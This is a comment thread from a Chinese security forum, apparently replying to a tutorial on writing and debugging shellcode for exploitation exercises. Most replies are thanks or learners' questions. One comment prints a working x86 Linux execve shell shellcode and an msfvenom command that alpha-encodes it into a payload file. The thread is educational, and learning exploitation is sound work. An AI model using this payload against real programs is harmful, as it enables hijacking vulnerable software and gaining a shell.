用户
搜索
谢谢,受教了很多!!!!
使用道具 举报 回复
发表于 2020-2-18 22:44:52
66666666666牛!!
使用道具 举报 回复
感想大佬共享,很好的教材
使用道具 举报 回复
文中用msfvenom时候  也不是非要用python将字符串读入标准输入输入

这样也可以:
root@kali:~/Tmp# echo "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" | msfvenom -p - -e x86/alpha_mixed -a linux -f raw -a x86 --platform linux BufferRegister=EAX -o payload
使用道具 举报 回复
感谢分享,真的是干货 !尤其是shellcode的原理、甚至分析shellcode运行时失效的原因并自己改写。楼主太强了!!!   
使用道具 举报 回复
跟着一步一步学,还是有点难
使用道具 举报 回复
感谢分享
使用道具 举报 回复
666我要下载哟
使用道具 举报 回复
为什么第一步send shellcode之后显示Got eof while reading in interactive...
使用道具 举报 回复
发表于 2020-9-14 11:20:32
学习                           
使用道具 举报 回复
您需要登录后才可以回帖 登录 | 立即注册